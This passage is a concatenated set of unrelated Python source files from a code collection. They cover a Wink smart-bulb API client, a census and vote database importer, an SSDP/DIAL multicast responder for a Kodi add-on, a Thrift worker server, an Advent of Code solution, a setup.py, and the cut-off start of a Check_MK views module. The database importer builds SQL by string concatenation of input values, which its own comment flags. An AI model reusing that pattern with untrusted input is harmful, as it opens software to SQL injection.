        # Wink wraps the device document in a 'data' envelope.
        self.jsonState = response_json.get('data')

    def _recent_state_set(self):
        # True while the optimistic window after setState is open.
        return time.time() - self._last_call[0] < 15
class wink_bulb(wink_binary_switch):
    """Represents a Wink dimmable light bulb.

    ``jsonState`` holds the ``data`` object returned by the Wink REST
    API.  Keys of interest: ``name``, ``light_bulb_id`` and
    ``last_reading`` (with ``powered`` / ``brightness`` fields).
    """
    jsonState = {}

    def __init__(self, ajsonobj):
        super().__init__(ajsonobj, "light_bulbs")

    def deviceId(self):
        return self.jsonState.get('light_bulb_id', self.name())

    def brightness(self):
        return self._last_reading.get('brightness')

    def setState(self, state, brightness=None):
        """
        :param state: a boolean of true (on) or false ('off')
        :return: nothing
        """
        payload = {"desired_state": {"powered": state}}
        if brightness is not None:
            payload["desired_state"]["brightness"] = brightness
        device_url = baseUrl + "/light_bulbs/%s" % self.deviceId()
        reply = requests.put(device_url, data=json.dumps(payload), headers=headers)
        self._updateStateFromResponse(reply.json())
        self._last_call = (time.time(), state)

    def __repr__(self):
        return "<Wink Bulb %s %s %s>" % (
            self.name(), self.deviceId(), self.state())
def get_devices(filter, constructor):
    """Fetch the user's Wink devices and wrap every visible device whose
    JSON contains the id key *filter* (e.g. 'light_bulb_id') with
    *constructor*.  Devices with hidden_at set are skipped.
    """
    listing_url = baseUrl + "/users/me/wink_devices"
    payload = requests.get(listing_url, headers=headers).json()
    return [
        constructor(entry)
        for entry in payload.get('data')
        if entry.get(filter) is not None and entry.get("hidden_at") is None
    ]
def get_bulbs():
    """Return all visible Wink light bulbs as wink_bulb objects."""
    return get_devices('light_bulb_id', wink_bulb)
def get_switches():
    """Return all visible Wink binary switches as wink_binary_switch objects."""
    return get_devices('binary_switch_id', wink_binary_switch)
def get_sensors():
    """Return all visible Wink sensor pods as wink_sensor_pod objects."""
    return get_devices('sensor_pod_id', wink_sensor_pod)
def is_token_set():
    """Return True once set_bearer_token() has stored auth headers."""
    return len(headers) > 0
def set_bearer_token(token):
    """Store the OAuth bearer *token* in the module-wide request headers
    used by every Wink API call."""
    global headers
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer {}".format(token)
    }
# Ad-hoc smoke test: fetch the bulbs and turn one off.
# NOTE(review): assumes set_bearer_token() was called beforehand and that
# at least four bulbs exist (index 3) — confirm before running.
if __name__ == "__main__":
    sw = get_bulbs()
    lamp = sw[3]
    lamp.setState(False)
| 2.84375 | 3 |
dataParsers/dbImporter/DBImporter.py | JohnsonLu3/Gerrymandering-Analysis | 0 | 12766387 | <gh_stars>0
from sqlalchemy import create_engine
from sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey
from sqlalchemy.sql import select
from sqlalchemy import text
from sqlalchemy.ext.automap import automap_base
# Module-level database handles, populated by connectToDB().
# (Unresolved merge conflict fixed in favour of the 'build-2' branch:
# main() connects lazily via connectToDB(), which also keeps the DB
# credentials out of source control instead of hard-coding them here.)
connection_string = ''
engine = None
conn = None
metadata = None
Base = None
Boundaries = None
States = None
Districts = None
Population = None

# Map of state name -> state FIPS id, filled by buildStateFPMap().
stateFPs = {}
def main():
    """Entry point: connect to the DB, then run the import steps.

    (Unresolved merge conflict fixed in favour of the 'build-2' branch,
    which introduces connectToDB(); steps that were already disabled on
    that branch stay commented out.)
    """
    connectToDB()
    # printTables()
    # buildStateFPMap()
    # importStateData()
    importStateBoundaryData()
    # importDistrictsAndVote('../parsedFiles/votingData.csv')
    # importPopulationData('../parsedFiles/VirginiaCensus.csv', "Virginia")
    # importPopulationData('../parsedFiles/NorthCarolinaCensus.csv', "North Carolina")
    # importPopulationData('../parsedFiles/nyCensus.csv', "New York")
    importDistrictBoundary("../parsedFiles/DistrictGeo_2016.csv", 2012)
    # Redistricting follows the census, so the 2001 files cover congresses 108-112.
    importDistrictBoundary("../parsedFiles/New_York_108_to_112.csv", 2001)
    importDistrictBoundary("../parsedFiles/North_Carolina_108_to_112.csv", 2001)
    importDistrictBoundary("../parsedFiles/Virginia_108_to_112.csv", 2001)


def connectToDB():
    """Create the SQLAlchemy engine/connection and reflect the schema.

    Reads the connection URL from the '../Connection' file (first line),
    then binds the module-level handles used by the import functions.
    """
    global connection_string
    global conn
    global engine
    global Boundaries
    global metadata
    global Base
    global States
    global Districts
    global Population
    # Use a context manager so the credentials file is always closed
    # (the original leaked the handle and bound connection_string locally).
    with open('../Connection', 'r') as con_url:
        connection_string = con_url.readline()
    engine = create_engine(connection_string, echo=True)
    conn = engine.connect()
    metadata = MetaData()
    metadata.reflect(bind=engine)
    Base = automap_base()
    Base.prepare(engine, reflect=True)
    Boundaries = Base.classes.Boundaries
    States = Base.classes.States
    Districts = Base.classes.Districts
    Population = Base.classes.Population
def buildStateFPMap():
    """Populate the module-level stateFPs map (state name -> FIPS id).

    Reads ../parsedFiles/StateGeo.csv, whose ';'-separated rows carry the
    FIPS id in column 0 and the state name in column 1.  The first
    occurrence of a state name wins.
    """
    # 'with' guarantees the file is closed even if parsing fails.
    with open("../parsedFiles/StateGeo.csv", 'r') as state_data:
        for line in state_data:
            fields = line.split(';')
            if fields[1] not in stateFPs:
                stateFPs[fields[1]] = fields[0]
def importStateData():
    """Insert one States row per distinct (state, year) pair found in
    ../parsedFiles/votingData.csv.

    ClickCount starts at zero.  Relies on stateFPs being filled by
    buildStateFPMap() first (lookups raise KeyError otherwise) and on
    connectToDB() having bound metadata/conn.
    """
    # populate voting data
    imported_state_years = set()  # O(1) membership vs. the original list
    with open("../parsedFiles/votingData.csv", 'r') as vote_data:
        for line in vote_data:
            # Strip the trailing newline once instead of per-field.
            data = line.rstrip('\n').split(',')
            if len(data) == 5:
                s_name = data[0]
                year = data[1]
                state_year = s_name + str(year)
                if state_year not in imported_state_years:
                    # get StateFp
                    s_id = stateFPs[s_name]
                    # import State Data
                    ins = metadata.tables['States'].insert().values(
                        StateId=s_id, StateName=s_name, Year=int(year),
                        ClickCount=0)
                    conn.execute(ins)
                    imported_state_years.add(state_year)
def importStateBoundaryData():
    """Import state boundary polygons into Boundaries/StateBoundaries.

    Reads '../parsedFiles/StateGeo.csv' (';'-separated: FIPS;name;polygon...)
    and, for every year 2000-2019 for which a matching States row exists,
    stores each polygon and links it via the StateBoundaries join table.

    Fixes: resolved two unresolved git merge conflicts by taking the
    ``build-2`` side (the complete newer version, which also introduced
    the separate importDistrictBoundary() below).
    """
    stateData = open("../parsedFiles/StateGeo.csv", 'r')
    for line in stateData:
        line = line.split(';')
        sId = int(line[0])
        polygons = line[2:]
        for yr in range(2000, 2020):
            boundaryPKId = []
            for polygon in polygons:
                polygon = "PolygonFromText(\'POLYGON(" + polygon + ")\')"
                ins = metadata.tables['Boundaries'].insert().values(Shape=text(polygon))
                result = conn.execute(ins)
                boundPKId = result.inserted_primary_key
                # get pkId from last inserted for StateBoundary FK
                boundaryPKId.append(boundPKId)
            # find state by year
            s = " SELECT Id " \
                + " FROM gerrymandering.States" \
                + " WHERE States.Year = " + str(yr) \
                + " AND States.StateId = " + str(sId)
            statePK = -1
            for row in conn.execute(s):
                statePK = row[0]
            if statePK != -1:
                # import StateBoundaries
                for pkId in boundaryPKId:
                    ins = metadata.tables['StateBoundaries'].insert().values(BoundaryId=pkId[0], StateId=statePK)
                    conn.execute(ins)
    stateData.close()
    return


def importDistrictBoundary(path, year):
    """Import district boundary polygons for one redistricting cycle.

    `year` is the first election year the boundaries apply to; the rows
    are linked to the matching district for that year and the following
    nine years (redistricting follows each decennial census).
    """
    geoData = open(path, 'r')
    for line in geoData:
        boundaryPKId = []
        line = line.split(';')
        sId = int(line[0])
        dId = int(line[1])
        #area = int(line[2])
        polygons = line[3:]
        for polygon in polygons:
            polygon = "PolygonFromText(\'POLYGON(" + polygon + ")\')"
            ins = metadata.tables['Boundaries'].insert().values(Shape=text(polygon))
            result = conn.execute(ins)
            boundPKId = result.inserted_primary_key
            # get pkId from last inserted for DistrictBoundary FK
            boundaryPKId.append(boundPKId)
        # import District Boundary
        for yr in range(year, year+10):
            dFK = -1
            # find district by dId, year, sId
            s = "SELECT "\
                + " Districts.Id " \
                + " FROM " \
                + " gerrymandering.Districts, gerrymandering.States " \
                + " WHERE " \
                + " Districts.StateId = States.Id and " \
                + " States.Year = " + str(yr) + " and States.StateId = " + str(sId) + " and Districts.DistrictId = " + str(dId)
            for row in conn.execute(s):
                dFK = row[0]
            if dFK != -1:
                for pkId in boundaryPKId:
                    ins = metadata.tables['DistrictBoundaries'].insert().values(BoundaryId=pkId[0], DistrictId=dFK)
                    conn.execute(ins)
            # upd = " UPDATE "\
            #     + " gerrymandering.Districts SET Districts.Area = " + str(area) \
            #     + " WHERE Districts.Id = " + str(dFK)
            #
            # conn.execute(upd)
    geoData.close()
    return
def importDistrictsAndVote(path):
    """Import district rows and their Republican/Democrat vote counts.

    CSV format: state,year,district,rVote,dVote. "Unopposed" races are
    encoded with the sentinel -1 for the unopposed party's opponent.

    Fixes: resolved the unresolved git merge conflicts (qualified
    ``SELECT States.Id`` and the trailing ``return`` from the build-2
    side) and closed the leaked file handle.
    NOTE(review): the SELECT interpolates sName/year into SQL directly;
    safe only for trusted local CSV input — consider bound parameters.
    """
    # Districts
    # `DistrictId`
    # `Area`
    # `clickCount`
    # `StateId` FK
    sName = -1
    dId = -1
    sFK = -1
    districtData = open(path, 'r')
    for line in districtData:
        line = line.split(',')
        sName = line[0]
        year = line[1]
        dId = line[2]
        rVote = line[3]
        dVote = line[4].replace('\n','')
        if rVote == "Unopposed": # Check if a party was unopposed if it is make -1 a FLAG that will mean unoppsed
            rVote = -1
            dVote = 0
        elif dVote == "Unopposed":
            rVote = 0
            dVote = -1
        # get fk using sName
        s = "SELECT States.Id FROM gerrymandering.States WHERE States.StateName = \'" + sName + "\' and States.Year = " + year
        for row in conn.execute(s):
            sFK = row[0]
        ins = metadata.tables['Districts'].insert().values(DistrictId = dId, clickCount = 0, StateId=sFK)
        result = conn.execute(ins)
        districtPK = result.inserted_primary_key
        # insert Vote data
        ins = metadata.tables['Votes'].insert().values(DistrictId = districtPK[0], Party = "Republican", voteCount=rVote)
        conn.execute(ins)
        ins = metadata.tables['Votes'].insert().values(DistrictId=districtPK[0], Party="Democrat", voteCount=dVote)
        conn.execute(ins)
    districtData.close()
    return
def importPopulationData(path, sName):
    """Import census population rows (one per race per district).

    CSV format: race_label,pop_district1,pop_district2,... Each race row
    is inserted once per district for the years 2010-2017 (the census
    window covered by the data).

    Fixes: resolved the unresolved git merge conflict by taking the
    ``build-2`` side, removed unused locals (`races`, `dId`), replaced
    the redundant if/elif label chain with a lookup table, and closed
    the leaked file handle.
    """
    # Population
    # `Id`
    # `Name` ENUM('Total', 'White', 'Black', 'Hispanic', 'Asian', 'PacificIslander', 'AmericanIndian', 'Other', 'Mixed')
    # `Population`
    # `DistrictId`
    # Map census labels onto the Population.Name ENUM values; unknown
    # labels pass through unchanged (same behavior as the old chain).
    race_map = {
        "Total population": "Total",
        "White": "White",
        "Asian": "Asian",
        "Black or African American": "Black",
        "American Indian and Alaska Native": "AmericanIndian",
        "Native Hawaiian and Other Pacific Islander": "PacificIslander",
        "Some other race": "Other",
        "Two or more races": "Mixed",
        "Hispanic or Latino (of any race)": "Hispanic",
    }
    censusData = open(path, 'r')
    for line in censusData:
        line = line.split(',')
        race = race_map.get(line[0], line[0])
        pop = line[1:]
        for year in range(2010, 2018):
            dIds = []
            # census data applies to the years 2010-2020, current year 2017
            # find district with by district id, year, and name
            s = "SELECT " \
                + "gerrymandering.Districts.Id " \
                + "FROM " \
                + "gerrymandering.Districts, gerrymandering.States " \
                + "WHERE " \
                + "States.Year = " + str(
                year) + " and States.StateName = \'" + sName + "\' and Districts.StateId = States.Id"
            for row in conn.execute(s):
                dIds.append(row[0])
            if len(dIds) != 0:
                for i in range(len(pop)):  # insert for the number of districts
                    ins = metadata.tables['Population'].insert().values(Name=race, Population=int(pop[i]),
                                                                        DistrictId=dIds[i])
                    conn.execute(ins)
    censusData.close()
    return
def printTables():
    """Debug helper: dump every row of every reflected table to stdout."""
    for table_name in metadata.tables:
        query = metadata.tables[table_name].select()
        for record in engine.execute(query):
            print(record)
    return
# Script entry point: run the import pipeline defined in main() above.
if __name__ == "__main__":
    main()
| 2.78125 | 3 |
resources/lib/tubecast/ssdp.py | pannal/script.tubecast | 0 | 12766388 | # -*- coding: utf-8 -*-
import contextlib
import operator
import socket
import struct
import threading
from resources.lib.kodi import kodilogging
from resources.lib.kodi.utils import get_setting_as_bool
from resources.lib.tubecast.kodicast import Kodicast
from resources.lib.tubecast.utils import build_template, str_to_bytes, PY3
if PY3:
from socketserver import DatagramRequestHandler, ThreadingUDPServer
else:
from SocketServer import DatagramRequestHandler, ThreadingUDPServer
logger = kodilogging.get_logger("ssdp")
def get_interface_address(if_name):
    """Return the 4 raw IPv4 address bytes of the given network interface.

    Uses the Linux SIOCGIFADDR ioctl (0x8915); `if_name` is the interface
    name as bytes, truncated to the 15-char IFNAMSIZ limit. The returned
    ifreq buffer carries the address at offset 20:24.
    """
    import fcntl # late import as this is only supported on Unix platforms.
    sciocgifaddr = 0x8915  # SIOCGIFADDR
    with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_DGRAM)) as s:
        return fcntl.ioctl(s.fileno(), sciocgifaddr, struct.pack(b'256s', if_name[:15]))[20:24]
class ControlMixin(object):
    """Mixin adding background start()/stop() control to a SocketServer.

    start() runs the server's serve_forever() on a daemon thread so the
    caller is not blocked; stop() shuts the server down and joins the
    thread.
    """

    def __init__(self, handler, poll_interval):
        self._thread = None
        self.poll_interval = poll_interval
        self._handler = handler

    def start(self):
        """Start serving in a background daemon thread (non-blocking)."""
        self._thread = t = threading.Thread(name=type(self).__name__,
                                            target=self.serve_forever,
                                            args=(self.poll_interval,))
        # Use the 'daemon' attribute instead of the deprecated setDaemon().
        t.daemon = True
        t.start()

    def stop(self):
        """Shut down serve_forever() and wait for the thread to finish."""
        self.shutdown()
        self._thread.join()
        self._thread = None
class MulticastServer(ControlMixin, ThreadingUDPServer):
    """Threaded UDP server listening on a multicast group (SSDP traffic).

    Binds on all interfaces at the group's port, joins the multicast
    group on construction and leaves it again in server_close().
    """
    allow_reuse_address = True

    def __init__(self, addr, handler, chromecast_addr, poll_interval=0.5, bind_and_activate=True, interfaces=None):
        # addr is (multicast_group, port); we bind '' (all interfaces)
        # at the group's port and join the group separately below.
        ThreadingUDPServer.__init__(self, ('', addr[1]),
                                    handler,
                                    bind_and_activate)
        ControlMixin.__init__(self, handler, poll_interval)
        self.chromecast_addr = chromecast_addr
        self._multicast_address = addr
        # Interfaces may be given as dotted-quad strings or (on Unix)
        # interface names resolved via get_interface_address().
        self._listen_interfaces = interfaces
        self.set_loopback_mode(1) # localhost
        self.set_ttl(2) # localhost and local network
        self.handle_membership(socket.IP_ADD_MEMBERSHIP)

    def set_loopback_mode(self, mode):
        # Whether our own multicast packets are looped back to us.
        mode = struct.pack("b", operator.truth(mode))
        self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_LOOP,
                               mode)

    def server_bind(self):
        # Set SO_REUSEADDR/SO_REUSEPORT (where available) so several SSDP
        # listeners can share port 1900; failures are logged, not fatal.
        try:
            if hasattr(socket, "SO_REUSEADDR"):
                self.socket.setsockopt(
                    socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        except Exception as e:
            logger.error(e)

        try:
            if hasattr(socket, "SO_REUSEPORT"):
                self.socket.setsockopt(
                    socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
        except Exception as e:
            logger.error(e)

        ThreadingUDPServer.server_bind(self)

    def handle_membership(self, cmd):
        """Join or leave the multicast group (cmd is IP_ADD/IP_DROP_MEMBERSHIP)."""
        if self._listen_interfaces is None:
            # Join on the default interface chosen by the kernel.
            mreq = struct.pack(
                str("4sI"), socket.inet_aton(self._multicast_address[0]),
                socket.INADDR_ANY)
            self.socket.setsockopt(socket.IPPROTO_IP,
                                   cmd, mreq)
        else:
            for interface in self._listen_interfaces:
                try:
                    if_addr = socket.inet_aton(interface)
                except socket.error:
                    # Not a dotted-quad address: treat it as an interface
                    # name (Unix only).
                    if_addr = get_interface_address(interface)
                mreq = socket.inet_aton(self._multicast_address[0]) + if_addr
                self.socket.setsockopt(socket.IPPROTO_IP,
                                       cmd, mreq)

    def set_ttl(self, ttl):
        # Multicast TTL: 2 keeps packets on the local network segment.
        ttl = struct.pack("B", ttl)
        self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)

    def server_close(self):
        self.handle_membership(socket.IP_DROP_MEMBERSHIP)
class SSDPHandler(DatagramRequestHandler):
    """Answers SSDP M-SEARCH datagrams for the DIAL service.

    Replies with a jinja-style template (rendered by build_template)
    pointing clients at this device's DIAL description URL.
    """

    # Raw SSDP response template; {{ ip }}, {{ port }} and {{ uuid }} are
    # substituted at reply time. Must keep the literal \r line endings.
    header = '''\
HTTP/1.1 200 OK\r
LOCATION: http://{{ ip }}:{{ port }}/ssdp/device-desc.xml\r
CACHE-CONTROL: max-age=1800\r
EXT: \r
SERVER: UPnP/1.0\r
BOOTID.UPNP.ORG: 1\r
USN: uuid:{{ uuid }}\r
ST: urn:dial-multiscreen-org:service:dial:1\r
\r
'''

    def handle(self):
        # self.request is (datagram_bytes, socket) for UDP handlers.
        data = self.request[0].strip()
        self.datagram_received(data, self.client_address)

    def reply(self, data, address):
        # NOTE(review): the local name 'socket' shadows the socket module
        # inside this method (harmless here, but easy to trip over).
        socket = self.request[1]
        socket.sendto(str_to_bytes(data), address)

    @staticmethod
    def get_remote_ip(address):
        # Create a socket to determine what address the client should use
        # NOTE(review): this UDP socket is never closed explicitly —
        # it is reclaimed by the GC, but an explicit close would be cleaner.
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(address)
        iface = s.getsockname()[0]
        return iface if PY3 else unicode(iface)

    def datagram_received(self, datagram, address):
        if get_setting_as_bool('debug-ssdp'):
            logger.debug('Datagram received. Address:{}; Content:{}'.format(address, datagram))
        # Only answer searches for the DIAL service type.
        if b"urn:dial-multiscreen-org:service:dial:1" in datagram and b"M-SEARCH" in datagram:
            if get_setting_as_bool('debug-ssdp'):
                logger.debug("Answering datagram")
            _, port = self.server.chromecast_addr
            data = build_template(self.header).render(
                ip=self.get_remote_ip(address),
                port=port,
                uuid=Kodicast.uuid
            )
            self.reply(data, address)
class SSDPserver(object):
    """Minimal SSDP (UPnP discovery) responder advertising the DIAL service."""

    # Well-known SSDP multicast group and port (UPnP Device Architecture).
    # Fix: the previous value '172.16.17.32' was a private *unicast*
    # address (an IP-scrubbing artifact); joining it as a multicast group
    # cannot work, so M-SEARCH discovery was broken. SSDP always uses
    # 239.255.255.250:1900.
    SSDP_ADDR = '239.255.255.250'
    SSDP_PORT = 1900

    def start(self, chromecast_addr, interfaces=None):
        """Bind the multicast listener and start answering M-SEARCH requests."""
        logger.info('Starting SSDP server')
        self.server = MulticastServer((self.SSDP_ADDR, self.SSDP_PORT), SSDPHandler,
                                      chromecast_addr=chromecast_addr,
                                      interfaces=interfaces)
        self.server.start()

    def shutdown(self):
        """Leave the multicast group and stop the serving thread."""
        logger.info('Stopping SSDP server')
        self.server.server_close()
        self.server.stop()
| 1.953125 | 2 |
tanit/worker/server/server.py | yassineazzouz/kraken | 1 | 12766389 | import logging as lg
from threading import Thread
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
from thrift.transport import TSocket
from thrift.transport import TTransport
from ...thrift.worker.service import WorkerService
from .handler import WorkerServiceHandler
from .worker import Worker
from ...common.config.configuration import TanitConfiguration
from ...common.config.configuration_keys import Keys
_logger = lg.getLogger(__name__)
class WorkerServer(object):
    """Thrift RPC server hosting the Tanit worker service.

    start() launches the RPC listener on a daemon thread, starts the
    worker services, then polls until stop() flips the `stopped` flag
    or the RPC thread dies.
    """

    def __init__(self):
        configuration = TanitConfiguration.getInstance()
        self.bind_address = configuration.get(Keys.WORKER_RPC_BIND_HOST)
        self.bind_port = configuration.get(Keys.WORKER_RPC_PORT)
        self.worker = Worker()
        self.stopped = False

    def stop(self):
        # Only flips the flag; the start() polling loop notices it within
        # its 0.5s join interval and performs the actual shutdown.
        self.stopped = True

    def _run(self):
        """Blocking body of the RPC daemon thread."""
        # Create Service handler
        handler = WorkerServiceHandler(self.worker)

        server = TServer.TThreadedServer(
            WorkerService.Processor(handler),
            TSocket.TServerSocket(self.bind_address, self.bind_port),
            TTransport.TBufferedTransportFactory(),
            TBinaryProtocol.TBinaryProtocolFactory(),
            daemon=True,
        )

        # Start Tanit server (blocks until the process exits).
        server.serve()

    def start(self):
        """Start the RPC thread and worker services, then supervise them."""
        self.stopped = False
        _logger.info("Stating Tanit worker server.")
        self.daemon = Thread(target=self._run, args=())
        # Use the 'daemon' attribute instead of the deprecated setDaemon().
        self.daemon.daemon = True
        self.daemon.start()
        _logger.info(
            "Tanit worker server started, listening at %s:%s",
            self.bind_address,
            self.bind_port,
        )

        # Start worker services
        try:
            self.worker.start()
        except Exception:
            _logger.exception("Failed to start Tanit worker services.")
            # raise SystemExit directly instead of the site-injected exit()
            # helper, which is not guaranteed to exist in all environments.
            raise SystemExit(1)

        try:
            while self.daemon.is_alive():
                # Try to join the child thread back to parent for 0.5 seconds
                self.daemon.join(0.5)
                if self.stopped:
                    _logger.info("Tanit worker server stopped, exiting.")
                    break
        except (KeyboardInterrupt, SystemExit):
            _logger.info("Received KeyboardInterrupt Signal.")
        except Exception as e:
            _logger.exception("Fatal server exception : %s, exiting", e)
        finally:
            _logger.info("Stopping Tanit worker server.")
            self.worker.stop()
            _logger.info("Tanit worker server stopped.")
| 1.960938 | 2 |
2016/Day 19 - Python/presentThiefPt2.py | AndreasDL/AdventOfCode | 0 | 12766390 | import sys
# Advent of Code 2016 day 19 part 2 (Josephus-style elimination):
# the current elf steals from the elf directly ACROSS the circle,
# i.e. floor(n/2) seats ahead, and the victim leaves the circle.
NO_ELVES = 3005290
#1->3 0->2
#2->5 1->4
#4->1 3->0
#2->4 1->3
#2 1 wins
# elfAtPosition[i] is the elf number sitting at circle position i.
elfAtPosition = [ i for i in range(NO_ELVES)]

#init
currIndex = 0
# NOTE(review): each `del` on the list is O(n), so the whole loop is
# O(n^2) — correct but slow for 3 million elves.
while len(elfAtPosition) > 1:
    # Victim sits floor(len/2) seats ahead of the current elf.
    nextIndex = int(currIndex + len(elfAtPosition)/2) % len(elfAtPosition)

    currElf = elfAtPosition[currIndex]
    nextElf = elfAtPosition[nextIndex]

    #print(currElf, " steals from ", nextElf)
    del elfAtPosition[nextIndex]

    if len(elfAtPosition) % 1000 == 0:
        print("pickpockets left: ", len(elfAtPosition))

    # Only advance when the victim sat after us; if the victim sat before
    # us, the deletion already shifted the next elf into currIndex.
    if currElf < nextElf:
        currIndex += 1
        currIndex %= len(elfAtPosition)

print(elfAtPosition) #this position is zero indexed! +1
setup.py | gismaps/PDF_Utils | 0 | 12766391 | '''
Build script for package's wheel and zip files.
Look in the `dist` folder for the output.
Usage:
Run as follows:
>python setup.py sdist --formats=zip bdist_wheel
'''
from pathlib import Path
import json
import os
import setuptools
import shutil
import sys
from platform import python_revision
def cleanup(name: str):
    '''
    Remove leftover artifacts from a previous build run.

    Args:
        name (str): The top-level package name (used for the egg-info dir).
    '''
    leftovers = ('./build', './src/{}.egg-info'.format(name))
    for path in leftovers:
        shutil.rmtree(path, ignore_errors=True)
# Pull name/version/author from the package's __init__.py so they live
# in exactly one place.
package_dict = {'name': '', '__version__': '', '__author__': ''}
init_path = Path("src") / 'pdf_utils' / '__init__.py'
print('Retrieved the following settings from __init__.py')
with open(init_path) as init:
    for line in init:
        for key in package_dict:
            if line.startswith(f'{key} = '):
                # Strip surrounding quotes/whitespace from the value.
                package_dict[key] = line.split('=')[1].strip().strip("\"'")
                print(f' >> {key}: {package_dict[key]}')
cleanup(package_dict['name']) # remove previous build cruft
# Long description for PyPI comes straight from the README.
with open('README.md') as fh:
    long_description = fh.read()
dependencies = setuptools.find_packages('src')
print('Package dependencies: {}'.format(dependencies))
# Install requirements are mirrored from requirements.txt.
with open('requirements.txt') as fh:
    requirements = fh.read().splitlines()
print('Package requirements: {}'.format(requirements))
setuptools.setup(
    name = package_dict['name'],
    version = package_dict['__version__'],
    author = package_dict['__author__'],
    description = 'PDF utility classes',
    long_description = long_description,
    long_description_content_type = 'text/markdown',
    url = 'https://github.com/gismaps/PDF_Utils',
    packages = dependencies,
    install_requires = requirements,
    package_dir = {'': 'src'},
    data_files = [], # [('license', ['LICENSE.txt'])], # done via MANIFEST.in
    include_package_data = True,
    license = "MIT",
    classifiers = [
        'Development Status :: 4 - Beta',
        'Programming Language :: Python :: 3.6',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
    ],
    python_requires = '>=3.6',
)
cleanup(package_dict['name']) # remove build cruft
print('setup.py ended normally')
| 2.21875 | 2 |
omd/versions/1.2.8p15.cre/share/check_mk/web/htdocs/views.py | NCAR/spol-nagios | 0 | 12766392 | #!/usr/bin/python
# -*- encoding: utf-8; py-indent-offset: 4 -*-
# +------------------------------------------------------------------+
# | ____ _ _ __ __ _ __ |
# | / ___| |__ ___ ___| | __ | \/ | |/ / |
# | | | | '_ \ / _ \/ __| |/ / | |\/| | ' / |
# | | |___| | | | __/ (__| < | | | | . \ |
# | \____|_| |_|\___|\___|_|\_\___|_| |_|_|\_\ |
# | |
# | Copyright <NAME> 2014 <EMAIL> |
# +------------------------------------------------------------------+
#
# This file is part of Check_MK.
# The official homepage is at http://mathias-kettner.de/check_mk.
#
# check_mk is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation in version 2. check_mk is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; with-
# out even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE. See the GNU General Public License for more de-
# tails. You should have received a copy of the GNU General Public
# License along with GNU Make; see the file COPYING. If not, write
# to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301 USA.
import config, defaults, livestatus, time, os, re, pprint
import weblib, traceback, forms, valuespec, inventory, visuals, metrics
import bi
from lib import *
# Datastructures and functions needed before plugins can be loaded
loaded_with_language = False
# Load all view plugins
def load_plugins(force):
    """(Re)load all view plugins and declare their permissions.

    Skips the expensive reload when plugins were already loaded for the
    current language (unless `force` is set), but always refreshes the
    host-tag painters since host tags can change at runtime.
    """
    global loaded_with_language
    if loaded_with_language == current_language and not force:
        # always reload the hosttag painters, because new hosttags might have been
        # added during runtime
        load_host_tag_painters()
        return

    # Reset all plugin registries before re-reading the plugin files.
    global multisite_datasources ; multisite_datasources = {}
    global multisite_layouts ; multisite_layouts = {}
    global multisite_painters ; multisite_painters = {}
    global multisite_sorters ; multisite_sorters = {}
    global multisite_builtin_views ; multisite_builtin_views = {}
    global multisite_painter_options ; multisite_painter_options = {}
    global multisite_commands ; multisite_commands = []
    global view_hooks ; view_hooks = {}
    global inventory_displayhints ; inventory_displayhints = {}

    config.declare_permission_section("action", _("Commands on host and services"), do_sort = True)

    load_web_plugins("views", globals())
    load_host_tag_painters()

    # This must be set after plugin loading to make broken plugins raise
    # exceptions all the time and not only the first time (when the plugins
    # are loaded).
    loaded_with_language = current_language

    # Declare permissions for builtin views
    config.declare_permission_section("view", _("Multisite Views"), do_sort = True)
    for name, view in multisite_builtin_views.items():
        config.declare_permission("view.%s" % name,
                _u(view["title"]),
                _u(view["description"]),
                config.builtin_role_ids)

    # Make sure that custom views also have permissions
    config.declare_dynamic_permissions(lambda: visuals.declare_custom_permissions('views'))

    # Add painter names to painter objects (e.g. for JSON web service)
    for n, p in multisite_painters.items():
        p["name"] = n
# Load all views - users or builtins
def load_views():
    """Load builtin and user views into the module-level registries.

    Populates `multisite_views` (all loadable views) and
    `available_views` (views the current user may use), then migrates
    any legacy-format views in place.
    """
    global multisite_views, available_views
    # Skip views which do not belong to known datasources
    multisite_views = visuals.load('views', multisite_builtin_views,
                    skip_func = lambda v: v['datasource'] not in multisite_datasources)
    available_views = visuals.available('views', multisite_views)
    transform_old_views()
def permitted_views():
    """Return the views available to the current user, loading on demand.

    AJAX entry points may call this before load_views() has populated the
    module-level `available_views`; in that case the name lookup raises
    NameError and the views are loaded first.

    Fix: the bare ``except:`` swallowed *every* exception (including
    KeyboardInterrupt/SystemExit); only the missing-global NameError is
    the expected failure here.
    """
    try:
        return available_views
    except NameError:
        # In some cases, for example when handling AJAX calls the views might
        # have not been loaded yet
        load_views()
        return available_views
def all_views():
    """Return all loaded views (builtin and user), without permission filtering."""
    return multisite_views
# Convert views that are saved in the pre 1.2.6-style
# FIXME: Can be removed one day. Mark as incompatible change or similar.
def transform_old_views():
    """Migrate pre-1.2.6 view definitions in `multisite_views` in place.

    Two legacy generations are handled:
    - views with 'context_type' (daily snapshots 2014-08 .. 2014-10) are
      delegated to visuals.transform_old_visual(),
    - classic views.mk views (no 'single_infos') get their
      'single_infos' derived from the old hide_filters and their
      show/hide/hard filter lists folded into the new 'context' dict.
    """
    for view in multisite_views.values():
        ds_name = view['datasource']
        datasource = multisite_datasources[ds_name]

        if "context" not in view: # legacy views did not have this explicitly
            view.setdefault("user_sortable", True)

        if 'context_type' in view:
            # This code transforms views from user_views.mk which have been migrated with
            # daily snapshots from 2014-08 till beginning 2014-10.
            visuals.transform_old_visual(view)

        elif 'single_infos' not in view:
            # This tries to map the datasource and additional settings of the
            # views to get the correct view context
            #
            # This code transforms views from views.mk (legacy format) to the current format
            try:
                hide_filters = view.get('hide_filters')

                # The set of hidden (= pre-filled single-object) filters
                # tells us which object type(s) the view was pinned to.
                if 'service' in hide_filters and 'host' in hide_filters:
